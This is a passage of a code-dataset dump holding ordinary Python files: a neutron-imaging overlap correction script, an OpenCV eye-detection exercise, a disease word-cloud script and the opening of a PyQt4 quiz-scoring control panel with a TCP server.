sumTime\n index += 1\n plt.axvline(x=sumTime)\n\n\n plt.show()\n# display(TimeArray)\n interval = {int(key):(value1,value2) for key,value1,value2 in zip(range(len(TimeArray)),TimeArray[::2],TimeArray[1::2])}\n tolerance= (TimeArray[2]-TimeArray[1])/2 #to lower down\n \n dfName = pd.DataFrame(sorted_fits,columns=['name'])\n dfName['ToF'] = df['Time']\n dfName['ShutterWindow']= dfName['ToF'].apply(lambda i:interAssig(i,interval,df_shutterCount, tolerance))\n indexname=0\n \n \n\n \n i_wb =0 # index used to initialize white beam image\n\n for names in dfName.groupby('ShutterWindow'):\n \n i=0;\n for idx, value in names[1]['name'].iteritems():\n with fits.open(value) as f:\n array = (f[0].data) # load the image file, size is rows x columns (es. 512x512)\n \n if i==0:\n sumim=np.zeros(np.shape(array)) # create a blank sum img for each new window\n prev_array=np.zeros(np.shape(array)) # variable containing the previous array, initialized to zeros (P. Boillat 12.7.19)\n i += 1 # (P. Boillat 12.7.19)\n \n# sumim+=array # pixel wise sum of loaded imgs\n sumim += (array.astype(float)/2 + prev_array.astype(float)/2) # pixel wise sum of loaded imgs (modified P. Boillat 12.7.19)\n \n if i_wb==0:\n white_beam=np.zeros(np.shape(array))\n i_wb = 1\n \n# if i==0:\n# P=0\n# i+=1 \n# else:\n P=sumim/names[0][1] # each pixel divided by the shutter count\n\n newim = array/(1-P) # image correction\n newim= newim.astype(float) # data casting, somehow the convertion to int does not work properly, I have then an error of wrong pixel depth\n white_beam += newim\n filename=filename_output+str(indexname).zfill(5)\n # display(filename)\n indexname+=1\n fits.writeto(folder_output+filename+'.fits',newim)\n\n# print(folder_output + filename_output + 'SummedImg.fits')\n fits.writeto(folder_output + filename_output + 'SummedImg.fits', white_beam)\n\n# finally I copy the txt files because they can be usefull for the future\n for txt in sorted_TXT:\n filename = txt\n destname = folder_output\n shutil.copy(filename, destname) \n \n \n \n ","sub_path":"python/ToF_notebooks/MCPOverLapCorrection/MCPOverLapCorrection.py","file_name":"MCPOverLapCorrection.py","file_ext":"py","file_size_in_byte":5034,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"103201899","text":"from cv2 import cv2\r\n\r\ntrainedClassifierFace = cv2.CascadeClassifier(r'E:\\ImageProcessingdenemeleri\\Trained Classifiers\\haarcascade_frontalface_default.xml')\r\ntrainedClassifierEye = cv2.CascadeClassifier(r'E:\\ImageProcessingdenemeleri\\Trained Classifiers\\haarcascade_eye_tree_eyeglasses.xml')\r\nmyVid = cv2.VideoCapture(r'E:\\ImageProcessingdenemeleri\\videos\\7.mp4')\r\n\r\nwhile myVid.isOpened():\r\n _, frame = myVid.read()\r\n frameG = cv2.cvtColor(frame,cv2.COLOR_BGR2GRAY)\r\n faces = trainedClassifierFace.detectMultiScale(frameG,2,2)\r\n for (x,y,w,h) in faces:\r\n roiFace = frame[y:y+h,x:x+w]\r\n roiFaceG = frameG[y:y+h,x:x+w]\r\n eyes = trainedClassifierEye.detectMultiScale(roiFaceG,2,2)\r\n for (ex,ey,ew,eh) in eyes:\r\n cv2.rectangle(roiFace,(ex,ey),(ex+ew,ey+eh),(0,255,255),2)\r\n cv2.imshow('Eye Detection',frame)\r\n k = cv2.waitKey(1) & 0xFF\r\n if k == 27:\r\n break\r\n\r\nmyVid.release()\r\ncv2.destroyAllWindows()","sub_path":"openCV/Exercises/ex54_EyeDetection2.py","file_name":"ex54_EyeDetection2.py","file_ext":"py","file_size_in_byte":967,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"426091676","text":"import health\nimport matplotlib.pyplot as plt\nfrom textblob import TextBlob\n\nfrom wordcloud import WordCloud\n\ndiseaseSearch = 'disease'\n\nlist_of_report = health.get_all_reports()\n\ncombinedDiseases = ''\n\nfor dis in list_of_report:\n combinedDiseases += ' ' + dis['disease']\n\nhealthBlob = TextBlob(combinedDiseases)\n\ndiseaseDictionary = dict()\n\nfor word in healthBlob.words:\n diseaseDictionary[word.lower()] = healthBlob.word_counts[word.lower()]\n\n\n\n\nwordCloud = WordCloud(background_color = 'white').generate_from_frequencies(diseaseDictionary)\nplt.title('Diseases in the US')\nplt.axis('off')\n\nfor dis in list_of_report:\n healthBlob = TextBlob(dis['disease'])\n\n\nplt.imshow(wordCloud, interpolation = 'bilinear')\nplt.show()\n\n\n\n\n\n\n\n\nplt.show()\n","sub_path":"stayHealthy.py","file_name":"stayHealthy.py","file_ext":"py","file_size_in_byte":749,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"567806454","text":"#!/usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\n\r\nfrom PyQt4 import QtCore, QtGui, QtNetwork\r\nfrom MySQL import HfDAO\r\nimport refresh\r\nimport display\r\n\r\ntry:\r\n _fromUtf8 = QtCore.QString.fromUtf8\r\nexcept AttributeError:\r\n def _fromUtf8(s):\r\n return s\r\n\r\ntry:\r\n _encoding = QtGui.QApplication.UnicodeUTF8\r\n def _translate(context, text, disambig):\r\n return QtGui.QApplication.translate(context, text, disambig, _encoding)\r\nexcept AttributeError:\r\n def _translate(context, text, disambig):\r\n return QtGui.QApplication.translate(context, text, disambig)\r\n\r\n# 数据库dao实例\r\nmdb = HfDAO()\r\n\r\nlistGrade = [g[1] for g in mdb.getAllGrade()]\r\nlistTeamName = [t[1] for t in mdb.getAllTeamName()]\r\ngradeTeam1List = []\r\ngradeTeam2List = []\r\ngradeTeam3List = []\r\ngradeTeam4List = []\r\ngradeTeam5List = []\r\ngradeTeam6List = []\r\ngradeTeamList = [gradeTeam1List, gradeTeam2List, gradeTeam3List, gradeTeam4List, gradeTeam5List, gradeTeam6List]\r\nfor (gradeTeam, grade) in zip(gradeTeamList, listGrade):\r\n gradeTeam.append(str(grade))\r\nclientDict = {}\r\nanswerList = ['Z', 'Z', 'Z', 'Z', 'Z', 'Z']\r\nnextQuestionId = mdb.getNextQuestionId()\r\ncurrentQuestionId = mdb.getCurrentQuestionId()\r\nteamId = 0\r\ntimePause = False\r\nhideSelection = False\r\n# isClearJudge = False\r\n\r\nclass ControlModule(object):\r\n def __init__(self, Dialog):\r\n self.labelTeamList = []\r\n self.editGradeList = []\r\n self.btnGradeList = []\r\n self.editGradeXList = []\r\n self.btnUndoList = []\r\n\r\n self.r = refresh.dashBoard()\r\n self.r.show()\r\n\r\n self.d = display.DisplayInfo()\r\n self.d.show()\r\n\r\n self.setupServer(Dialog)\r\n self.setupUi(Dialog)\r\n\r\n def setupServer(self, Dialog):\r\n self.tcpServer = QtNetwork.QTcpServer()\r\n self.tcpServer.newConnection.connect(self.acceptConnection)\r\n self.tcpServer.listen(QtNetwork.QHostAddress.Any, 8002)\r\n\r\n def acceptConnection(self):\r\n self.tcpServerConnection = self.tcpServer.nextPendingConnection()\r\n # self.tcpServerConnection.connected.connect(self.connectSuccess)\r\n self.tcpServerConnection.readyRead.connect(self.receiveData)\r\n self.tcpServerConnection.error.connect(self.displayError)\r\n self.tcpServerConnection.disconnected.connect(self.warningDisconnection)\r\n clientDict[self.tcpServerConnection.peerAddress()] = self.tcpServerConnection\r\n\r\n def receiveData(self):\r\n connection = QtNetwork.QTcpSocket().sender()\r\n client = clientDict[connection.peerAddress()]\r\n word = client.readAll()\r\n if word == '1':\r\n client.id = '1'\r\n self.d.appendInfo('find client 1:(%s, %d)' % (client.peerAddress().toString(), client.peerPort())) \r\n mdb.updateIpById(client.id, client.peerAddress().toString())\r\n return\r\n elif word == '2':\r\n client.id = '2'\r\n self.d.appendInfo('find client 2:(%s, %d)' % (client.peerAddress().toString(), client.peerPort())) \r\n mdb.updateIpById(client.id, client.peerAddress().toString())\r\n return\r\n elif word == '3':\r\n client.id = '3'\r\n self.d.appendInfo('find client 3:(%s, %d)' % (client.peerAddress().toString(), client.peerPort())) \r\n mdb.updateIpById(client.id, client.peerAddress().toString())\r\n return\r\n elif word == '4':\r\n client.id = '4'\r\n self.d.appendInfo('find client 4:(%s, %d)' % (client.peerAddress().toString(), client.peerPort())) \r\n mdb.updateIpById(client.id, client.peerAddress().toString())\r\n return\r\n elif word == '5':\r\n client.id = '5'\r\n self.d.appendInfo('find client 5:(%s, %d)' % (client.peerAddress().toString(), client.peerPort())) \r\n mdb.updateIpById(client.id, client.peerAddress().toString())\r\n return\r\n elif word == '6':\r\n client.id = '6'\r\n self.d.appendInfo('find client 6:(%s, %d)' % (client.peerAddress().toString(), client.peerPort())) \r\n mdb.updateIpById(client.id, client.peerAddress().toString())\r\n return\r\n elif word == '999':\r\n client.id = '999'\r\n self.d.appendInfo('find client 999:(%s, %d)' % (client.peerAddress().toString(), client.peerPort())) \r\n return\r\n elif word == '998':\r\n client.id = '998'\r\n self.d.appendInfo('find client 998:(%s, %d)' % (client.peerAddress().toString(), client.peerPort())) \r\n return\r\n\r\n global answerList\r\n \r\n answerList[int(client.id)-1] = word[0]\r\n mdb.addAnswerlog(currentQuestionId, answerList)\r\n if word[0] == mdb.getAnswer(currentQuestionId)[1]:\r\n self.d.appendInfo('client %s send %s, it is correct' % (client.id, word))\r\n if currentQuestionId > 20:\r\n answerList = ['Z', 'Z', 'Z', 'Z', 'Z', 'Z']\r\n return\r\n g = int(self.editGradeList[int(client.id)-1].text())\r\n self.editGradeList[int(client.id)-1].setText(str(g+10))\r\n else:\r\n self.d.appendInfo('client %s send %s, it is wrong' % (client.id, word))\r\n if currentQuestionId > 20:\r\n answerList = ['Z', 'Z', 'Z', 'Z', 'Z', 'Z']\r\n return\r\n\r\n def displayError(self, socketError):\r\n connection = QtNetwork.QTcpSocket().sender()\r\n client = clientDict[connection.peerAddress()]\r\n if socketError == QtNetwork.QTcpSocket.RemoteHostClosedError:\r\n return\r\n self.d.appendInfo(\"The following error occured: %s.\" % client.errorString()) \r\n\r\n def warningDisconnection(self):\r\n connection = QtNetwork.QTcpSocket().sender()\r\n client = clientDict[connection.peerAddress()]\r\n self.d.appendInfo(\"team%s disconnected!!!!!!!!\" % client.id)\r\n\r\n def setupUi(self, Dialog):\r\n Dialog.setWindowTitle(_translate(\"Dialog\", \"校史决赛后台控制系统 - %d\" % self.tcpServer.serverPort(), None))\r\n Dialog.setObjectName(_fromUtf8(\"Dialog\"))\r\n Dialog.setFixedSize(1000, 505)\r\n\r\n # layout\r\n self.gridLayoutWidget = QtGui.QWidget(Dialog)\r\n self.gridLayoutWidget.setGeometry(QtCore.QRect(140, 60, 851, 241))\r\n self.gridLayoutWidget.setObjectName(_fromUtf8(\"gridLayoutWidget\"))\r\n self.gridLayout = QtGui.QGridLayout(self.gridLayoutWidget)\r\n self.gridLayout.setMargin(0)\r\n self.gridLayout.setObjectName(_fromUtf8(\"gridLayout\"))\r\n self.gridLayoutWidget_2 = QtGui.QWidget(Dialog)\r\n self.gridLayoutWidget_2.setGeometry(QtCore.QRect(10, 60, 111, 241))\r\n self.gridLayoutWidget_2.setObjectName(_fromUtf8(\"gridLayoutWidget_2\"))\r\n self.gridLayout_2 = QtGui.QGridLayout(self.gridLayoutWidget_2)\r\n self.gridLayout_2.setMargin(0)\r\n self.gridLayout_2.setObjectName(_fromUtf8(\"gridLayout_2\"))\r\n\r\n # 队伍编号和名称\r\n self.labelTeam1 = QtGui.QLabel(self.gridLayoutWidget_2)\r\n self.labelTeam1.setObjectName(_fromUtf8(\"labelTeam1\"))\r\n self.gridLayout_2.addWidget(self.labelTeam1, 0, 0, 1, 1)\r\n self.labelTeamList.append(self.labelTeam1)\r\n self.labelTeam2 = QtGui.QLabel(self.gridLayoutWidget_2)\r\n self.labelTeam2.setObjectName(_fromUtf8(\"labelTeam2\"))\r\n self.gridLayout_2.addWidget(self.labelTeam2, 1, 0, 1, 1)\r\n self.labelTeamList.append(self.labelTeam2)\r\n self.labelTeam3 = QtGui.QLabel(self.gridLayoutWidget_2)\r\n self.labelTeam3.setObjectName(_fromUtf8(\"labelTeam3\"))\r\n self.gridLayout_2.addWidget(self.labelTeam3, 2, 0, 1, 1)\r\n self.labelTeamList.append(self.labelTeam3)\r\n self.labelTeam4 = QtGui.QLabel(self.gridLayoutWidget_2)\r\n self.labelTeam4.setObjectName(_fromUtf8(\"labelTeam4\"))\r\n self.gridLayout_2.addWidget(self.labelTeam4, 3, 0, 1, 1)\r\n self.labelTeamList.append(self.labelTeam4)\r\n self.labelTeam5 = QtGui.QLabel(self.gridLayoutWidget_2)\r\n self.labelTeam5.setObjectName(_fromUtf8(\"labelTeam5\"))\r\n self.gridLayout_2.addWidget(self.labelTeam5, 4, 0, 1, 1)\r\n self.labelTeamList.append(self.labelTeam5)\r\n self.labelTeam6 = QtGui.QLabel(self.gridLayoutWidget_2)\r\n self.labelTeam6.setObjectName(_fromUtf8(\"labelTeam6\"))\r\n self.gridLayout_2.addWidget(self.labelTeam6, 5, 0, 1, 1)\r\n self.labelTeamList.append(self.labelTeam6)\r\n \r\n # 其他label\r\n self.labelTeam = QtGui.QLabel(Dialog)\r\n self.labelTeam.setGeometry(QtCore.QRect(50, 10, 54, 12))\r\n self.labelTeam.setObjectName(_fromUtf8(\"labelTeam\"))\r\n self.labelGrade = QtGui.QLabel(Dialog)\r\n self.labelGrade.setGeometry(QtCore.QRect(145, 10, 54, 12))\r\n self.labelGrade.setObjectName(_fromUtf8(\"labelGrade\"))\r\n self.labelGradePart1 = QtGui.QLabel(Dialog)\r\n self.labelGradePart1.setGeometry(QtCore.QRect(310, 40, 54, 12))\r\n self.labelGradePart1.setObjectName(_fromUtf8(\"labelGradePart1\"))\r\n self.labelGradePart2 = QtGui.QLabel(Dialog)\r\n self.labelGradePart2.setGeometry(QtCore.QRect(550, 40, 54, 12))\r\n self.labelGradePart2.setObjectName(_fromUtf8(\"labelGradePart2\"))\r\n self.labelGradeControl = QtGui.QLabel(Dialog)\r\n self.labelGradeControl.setGeometry(QtCore.QRect(520, 10, 131, 16))\r\n self.labelGradeControl.setObjectName(_fromUtf8(\"labelGradeControl\"))\r\n self.labelGradePart3 = QtGui.QLabel(Dialog)\r\n self.labelGradePart3.setGeometry(QtCore.QRect(730, 40, 54, 12))\r\n self.labelGradePart3.setObjectName(_fromUtf8(\"labelGradePart3\"))\r\n self.labelGradePart4 = QtGui.QLabel(Dialog)\r\n self.labelGradePart4.setGeometry(QtCore.QRect(850, 40, 54, 12))\r\n self.labelGradePart4.setObjectName(_fromUtf8(\"labelGradePart4\"))\r\n self.labelChooseTeam = QtGui.QLabel(Dialog)\r\n self.labelChooseTeam.setGeometry(QtCore.QRect(20, 330, 121, 16))\r\n self.labelChooseTeam.setObjectName(_fromUtf8(\"labelChooseTeam\"))\r\n self.labelShowControl = QtGui.QLabel(Dialog)\r\n self.labelShowControl.setGeometry(QtCore.QRect(20, 470, 111, 16))\r\n self.labelShowControl.setObjectName(_fromUtf8(\"labelShowControl\"))\r\n\r\n # 分数显示框\r\n self.editTeam1Grade = QtGui.QLineEdit(self.gridLayoutWidget)\r\n self.editTeam1Grade.setObjectName(_fromUtf8(\"editTeam1Grade\"))\r\n self.gridLayout.addWidget(self.editTeam1Grade, 0, 0, 1, 1)\r\n self.editGradeList.append(self.editTeam1Grade)\r\n self.editTeam2Grade = QtGui.QLineEdit(self.gridLayoutWidget)\r\n self.editTeam2Grade.setObjectName(_fromUtf8(\"editTeam2Grade\"))\r\n self.gridLayout.addWidget(self.editTeam2Grade, 1, 0, 1, 1)\r\n self.editGradeList.append(self.editTeam2Grade)\r\n self.editTeam3Grade = QtGui.QLineEdit(self.gridLayoutWidget)\r\n self.editTeam3Grade.setObjectName(_fromUtf8(\"editTeam3Grade\"))\r\n self.gridLayout.addWidget(self.editTeam3Grade, 2, 0, 1, 1)\r\n self.editGradeList.append(self.editTeam3Grade)\r\n self.editTeam4Grade = QtGui.QLineEdit(self.gridLayoutWidget)\r\n self.editTeam4Grade.setObjectName(_fromUtf8(\"editTeam4Grade\"))\r\n self.gridLayout.addWidget(self.editTeam4Grade, 3, 0, 1, 1)\r\n self.editGradeList.append(self.editTeam4Grade)\r\n self.editTeam5Grade = QtGui.QLineEdit(self.gridLayoutWidget)\r\n self.editTeam5Grade.setObjectName(_fromUtf8(\"editTeam5Grade\"))\r\n self.gridLayout.addWidget(self.editTeam5Grade, 4, 0, 1, 1)\r\n self.editGradeList.append(self.editTeam5Grade)\r\n self.editTeam6Grade = QtGui.QLineEdit(self.gridLayoutWidget)\r\n self.editTeam6Grade.setObjectName(_fromUtf8(\"editTeam6Grade\"))\r\n self.gridLayout.addWidget(self.editTeam6Grade, 5, 0, 1, 1)\r\n self.editGradeList.append(self.editTeam6Grade)\r\n \r\n # 自定义分数框\r\n self.editTeam1AddX = QtGui.QLineEdit(self.gridLayoutWidget)\r\n self.editTeam1AddX.setObjectName(_fromUtf8(\"editTeam1AddX\"))\r\n self.gridLayout.addWidget(self.editTeam1AddX, 0, 7, 1, 1)\r\n self.editGradeXList.append(self.editTeam1AddX)\r\n self.editTeam2AddX = QtGui.QLineEdit(self.gridLayoutWidget)\r\n self.editTeam2AddX.setObjectName(_fromUtf8(\"editTeam2AddX\"))\r\n self.gridLayout.addWidget(self.editTeam2AddX, 1, 7, 1, 1)\r\n self.editGradeXList.append(self.editTeam2AddX)\r\n self.editTeam3AddX = QtGui.QLineEdit(self.gridLayoutWidget)\r\n self.editTeam3AddX.setObjectName(_fromUtf8(\"editTeam3AddX\"))\r\n self.gridLayout.addWidget(self.editTeam3AddX, 2, 7, 1, 1)\r\n self.editGradeXList.append(self.editTeam3AddX)\r\n self.editTeam4AddX = QtGui.QLineEdit(self.gridLayoutWidget)\r\n self.editTeam4AddX.setObjectName(_fromUtf8(\"editTeam4AddX\"))\r\n self.gridLayout.addWidget(self.editTeam4AddX, 3, 7, 1, 1)\r\n self.editGradeXList.append(self.editTeam4AddX)\r\n self.editTeam5AddX = QtGui.QLineEdit(self.gridLayoutWidget)\r\n self.editTeam5AddX.setObjectName(_fromUtf8(\"editTeam5AddX\"))\r\n self.gridLayout.addWidget(self.editTeam5AddX, 4, 7, 1, 1)\r\n self.editGradeXList.append(self.editTeam5AddX)\r\n self.editTeam6AddX = QtGui.QLineEdit(self.gridLayoutWidget)\r\n self.editTeam6AddX.setObjectName(_fromUtf8(\"editTeam6AddX\"))\r\n self.gridLayout.addWidget(self.editTeam6AddX, 5, 7, 1, 1)\r\n self.editGradeXList.append(self.editTeam6AddX)\r\n\r\n # 分数控制按钮\r\n # 队伍1\r\n self.btnTeam1Add10 = QtGui.QPushButton(self.gridLayoutWidget)\r\n self.btnTeam1Add10.setObjectName(_fromUtf8(\"btnTeam1Add10\"))\r\n self.gridLayout.addWidget(self.btnTeam1Add10, 0, 1, 1, 1)\r\n self.btnGradeList.append(self.btnTeam1Add10)\r\n self.btnTeam1Add20 = QtGui.QPushButton(self.gridLayoutWidget)\r\n self.btnTeam1Add20.setObjectName(_fromUtf8(\"btnTeam1Add20\"))\r\n self.gridLayout.addWidget(self.btnTeam1Add20, 0, 2, 1, 1)\r\n self.btnGradeList.append(self.btnTeam1Add20)\r\n self.btnTeam1Sub15 = QtGui.QPushButton(self.gridLayoutWidget)\r\n self.btnTeam1Sub15.setObjectName(_fromUtf8(\"btnTeam1Sub15\"))\r\n self.gridLayout.addWidget(self.btnTeam1Sub15, 0, 3, 1, 1)\r\n self.btnGradeList.append(self.btnTeam1Sub15)\r\n self.btnTeam1Add15 = QtGui.QPushButton(self.gridLayoutWidget)\r\n self.btnTeam1Add15.setObjectName(_fromUtf8(\"btnTeam1Add15\"))\r\n self.gridLayout.addWidget(self.btnTeam1Add15, 0, 4, 1, 1)\r\n self.btnGradeList.append(self.btnTeam1Add15)\r\n self.btnTeam1Add25 = QtGui.QPushButton(self.gridLayoutWidget)\r\n self.btnTeam1Add25.setObjectName(_fromUtf8(\"btnTeam1Add25\"))\r\n self.gridLayout.addWidget(self.btnTeam1Add25, 0, 5, 1, 1)\r\n self.btnGradeList.append(self.btnTeam1Add25)\r\n self.btnTeam1Add35 = QtGui.QPushButton(self.gridLayoutWidget)\r\n self.btnTeam1Add35.setObjectName(_fromUtf8(\"btnTeam1Add35\"))\r\n self.gridLayout.addWidget(self.btnTeam1Add35, 0, 6, 1, 1)\r\n self.btnGradeList.append(self.btnTeam1Add35)\r\n self.btnTeam1AddX = QtGui.QPushButton(self.gridLayoutWidget)\r\n self.btnTeam1AddX.setObjectName(_fromUtf8(\"btnTeam1AddX\"))\r\n self.gridLayout.addWidget(self.btnTeam1AddX, 0, 8, 1, 1)\r\n self.btnGradeList.append(self.btnTeam1AddX)\r\n self.btnTeam1Add3 = QtGui.QPushButton(self.gridLayoutWidget)\r\n self.btnTeam1Add3.setObjectName(_fromUtf8(\"btnTeam1Add3\"))\r\n self.gridLayout.addWidget(self.btnTeam1Add3, 0, 9, 1, 1)\r\n self.btnGradeList.append(self.btnTeam1Add3)\r\n # 队伍2\r\n self.btnTeam2Add10 = QtGui.QPushButton(self.gridLayoutWidget)\r\n self.btnTeam2Add10.setObjectName(_fromUtf8(\"btnTeam2Add10\"))\r\n self.gridLayout.addWidget(self.btnTeam2Add10, 1, 1, 1, 1)\r\n self.btnGradeList.append(self.btnTeam2Add10)\r\n self.btnTeam2Add20 = QtGui.QPushButton(self.gridLayoutWidget)\r\n self.btnTeam2Add20.setObjectName(_fromUtf8(\"btnTeam2Add20\"))\r\n self.gridLayout.addWidget(self.btnTeam2Add20, 1, 2, 1, 1)\r\n self.btnGradeList.append(self.btnTeam2Add20)\r\n self.btnTeam2Sub15 = QtGui.QPushButton(self.gridLayoutWidget)\r\n self.btnTeam2Sub15.setObjectName(_fromUtf8(\"btnTeam2Sub15\"))\r\n self.gridLayout.addWidget(self.btnTeam2Sub15, 1, 3, 1, 1)\r\n self.btnGradeList.append(self.btnTeam2Sub15)\r\n self.btnTeam2Add15 = QtGui.QPushButton(self.gridLayoutWidget)\r\n self.btnTeam2Add15.setObjectName(_fromUtf8(\"btnTeam2Add15\"))\r\n self.gridLayout.addWidget(self.btnTeam2Add15, 1, 4, 1, 1)\r\n self.btnGradeList.append(self.btnTeam2Add15)\r\n self.btnTeam2Add25 = QtGui.QPushButton(self.gridLayoutWidget)\r\n self.btnTeam2Add25.setObjectName(_fromUtf8(\"btnTeam2Add25\"))\r\n self.gridLayout.addWidget(self.btnTeam2Add25, 1, 5, 1, 1)\r\n self.btnGradeList.append(self.btnTeam2Add25)\r\n self.btnTeam2Add35 = QtGui.QPushButton(self.gridLayoutWidget)\r\n self.btnTeam2Add35.setObjectName(_fromUtf8(\"btnTeam2Add35\"))\r\n self.gridLayout.addWidget(self.btnTeam2Add35, 1, 6, 1, 1)\r\n self.btnGradeList.append(self.btnTeam2Add35)\r\n self.btnTeam2AddX = QtGui.QPushButton(self.gridLayoutWidget)\r\n self.btnTeam2AddX.setObjectName(_fromUtf8(\"btnTeam2AddX\"))\r\n self.gridLayout.addWidget(self.btnTeam2AddX, 1, 8, 1, 1)\r\n self.btnGradeList.append(self.btnTeam2AddX)\r\n self.btnTeam2Add3 = QtGui.QPushButton(self.gridLayoutWidget)\r\n self.btnTeam2Add3.setObjectName(_fromUtf8(\"btnTeam2Add3\"))\r\n self.gridLayout.addWidget(self.btnTeam2Add3, 1, 9, 1, 1)\r\n self.btnGradeList.append(self.btnTeam2Add3)\r\n # 队伍3\r\n self.btnTeam3Add10 = QtGui.QPushButton(self.gridLayoutWidget)\r\n self.btnTeam3Add10.setObjectName(_fromUtf8(\"btnTeam3Add10\"))\r\n self.gridLayout.addWidget(self.btnTeam3Add10, 2, 1, 1, 1)\r\n self.btnGradeList.append(self.btnTeam3Add10)\r\n self.btnTeam3Add20 = QtGui.QPushButton(self.gridLayoutWidget)\r\n self.btnTeam3Add20.setObjectName(_fromUtf8(\"btnTeam3Add20\"))\r\n self.gridLayout.addWidget(self.btnTeam3Add20, 2, 2, 1, 1)\r\n self.btnGradeList.append(self.btnTeam3Add20)\r\n self.btnTeam3Sub15 = QtGui.QPushButton(self.gridLayoutWidget)\r\n self.btnTeam3Sub15.setObjectName(_fromUtf8(\"btnTeam3Sub15\"))\r\n self.gridLayout.addWidget(self.btnTeam3Sub15, 2, 3, 1, 1)\r\n self.btnGradeList.append(self.btnTeam3Sub15)\r\n self.btnTeam3Add15 = QtGui.QPushButton(self.gridLayoutWidget)\r\n self.btnTeam3Add15.setObjectName(_fromUtf8(\"btnTeam3Add15\"))\r\n self.gridLayout.addWidget(self.btnTeam3Add15, 2, 4, 1, 1)\r\n self.btnGradeList.append(self.btnTeam3Add15)\r\n self.btnTeam3Add25 = QtGui.QPushButton(self.gridLayoutWidget)\r\n self.btnTeam3Add25.setObjectName(_fromUtf8(\"btnTeam3Add25\"))\r\n self.gridLayout.addWidget(self.btnTeam3Add25, 2, 5, 1, 1)\r\n self.btnGradeList.append(self.btnTeam3Add25)\r\n self.btnTeam3Add35 = QtGui.QPushButton(self.gridLayoutWidget)\r\n self.btnTeam3Add35.setObjectName(_fromUtf8(\"btnTeam3Add35\"))\r\n self.gridLayout.addWidget(self.btnTeam3Add35, 2, 6, 1, 1)\r\n self.btnGradeList.append(self.btnTeam3Add35)\r\n self.btnTeam3AddX = QtGui.QPushButton(self.gridLayoutWidget)\r\n self.btnTeam3AddX.setObjectName(_fromUtf8(\"btnTeam3AddX\"))\r\n self.gridLayout.addWidget(self.btnTeam3AddX, 2, 8, 1, 1)\r\n self.btnGradeList.append(self.btnTeam3AddX)\r\n self.btnTeam3Add3 = QtGui.QPushButton(self.gridLayoutWidget)\r\n self.btnTeam3Add3.setObjectName(_fromUtf8(\"btnTeam3Add3\"))\r\n self.gridLayout.addWidget(self.btnTeam3Add3, 2, 9, 1, 1)\r\n self.btnGradeList.append(self.btnTeam3Add3)\r\n # 队伍4\r\n self.btnTeam4Add10 = QtGui.QPushButton(self.gridLayoutWidget)\r\n self.btnTeam4Add10.setObjectName(_fromUtf8(\"btnTeam4Add10\"))\r\n self.gridLayout.addWidget(self.btnTeam4Add10, 3, 1, 1, 1)\r\n self.btnGradeList.append(self.btnTeam4Add10)\r\n self.btnTeam4Add20 = QtGui.QPushButton(self.gridLayoutWidget)\r\n self.btnTeam4Add20.setObjectName(_fromUtf8(\"btnTeam4Add20\"))\r\n self.gridLayout.addWidget(self.btnTeam4Add20, 3, 2, 1, 1)\r\n self.btnGradeList.append(self.btnTeam4Add20)\r\n self.btnTeam4Sub15 = QtGui.QPushButton(self.gridLayoutWidget)\r\n self.btnTeam4Sub15.setObjectName(_fromUtf8(\"btnTeam4Sub15\"))\r\n self.gridLayout.addWidget(self.btnTeam4Sub15, 3, 3, 1, 1)\r\n self.btnGradeList.append(self.btnTeam4Sub15)\r\n self.btnTeam4Add15 = QtGui.QPushButton(self.gridLayoutWidget)\r\n self.btnTeam4Add15.setObjectName(_fromUtf8(\"btnTeam4Add15\"))\r\n self.gridLayout.addWidget(self.btnTeam4Add15, 3, 4, 1, 1)\r\n self.btnGradeList.append(self.btnTeam4Add15)\r\n self.btnTeam4Add25 = QtGui.QPushButton(self.gridLayoutWidget)\r\n self.btnTeam4Add25.setObjectName(_fromUtf8(\"btnTeam4Add25\"))\r\n self.gridLayout.addWidget(self.btnTeam4Add25, 3, 5, 1, 1)\r\n self.btnGradeList.append(self.btnTeam4Add25)\r\n self.btnTeam4Add35 = QtGui.QPushButton(self.gridLayoutWidget)\r\n self.btnTeam4Add35.setObjectName(_fromUtf8(\"btnTeam4Add35\"))\r\n self.gridLayout.addWidget(self.btnTeam4Add35, 3, 6, 1, 1)\r\n self.btnGradeList.append(self.btnTeam4Add35)\r\n self.btnTeam4AddX = QtGui.QPushButton(self.gridLayoutWidget)\r\n self.btnTeam4AddX.setObjectName(_fromUtf8(\"btnTeam4AddX\"))\r\n self.gridLayout.addWidget(self.btnTeam4AddX, 3, 8, 1, 1)\r\n self.btnGradeList.append(self.btnTeam4AddX)\r\n self.btnTeam4Add3 = QtGui.QPushButton(self.gridLayoutWidget)\r\n self.btnTeam4Add3.setObjectName(_fromUtf8(\"btnTeam4Add3\"))\r\n self.gridLayout.addWidget(self.btnTeam4Add3, 3, 9, 1, 1)\r\n self.btnGradeList.append(self.btnTeam4Add3)\r\n # 队伍5\r\n self.btnTeam5Add10 = QtGui.QPushButton(self.gridLayoutWidget)\r\n self.btnTeam5Add10.setObjectName(_fromUtf8(\"btnTeam5Add10\"))\r\n self.gridLayout.addWidget(self.btnTeam5Add10, 4, 1, 1, 1)\r\n self.btnGradeList.append(self.btnTeam5Add10)\r\n self.btnTeam5Add20 = QtGui.QPushButton(self.gridLayoutWidget)\r\n self.btnTeam5Add20.setObjectName(_fromUtf8(\"btnTeam5Add20\"))\r\n self.gridLayout.addWidget(self.btnTeam5Add20, 4, 2, 1, 1)\r\n self.btnGradeList.append(self.btnTeam5Add20)\r\n self.btnTeam5Sub15 = QtGui.QPushButton(self.gridLayoutWidget)\r\n self.btnTeam5Sub15.setObjectName(_fromUtf8(\"btnTeam5Sub15\"))\r\n self.gridLayout.addWidget(self.btnTeam5Sub15, 4, 3, 1, 1)\r\n self.btnGradeList.append(self.btnTeam5Sub15)\r\n self.btnTeam5Add15 = QtGui.QPushButton(self.gridLayoutWidget)\r\n self.btnTeam5Add15.setObjectName(_fromUtf8(\"btnTeam5Add15\"))\r\n self.gridLayout.addWidget(self.btnTeam5Add15, 4, 4, 1, 1)\r\n self.btnGradeList.append(self.btnTeam5Add15)\r\n self.btnTeam5Add25 = QtGui.QPushButton(self.gridLayoutWidget)\r\n self.btnTeam5Add25.setObjectName(_fromUtf8(\"btnTeam5Add25\"))\r\n self.gridLayout.addWidget(self.btnTeam5Add25, 4, 5, 1, 1)\r\n self.btnGradeList.append(self.btnTeam5Add25)\r\n 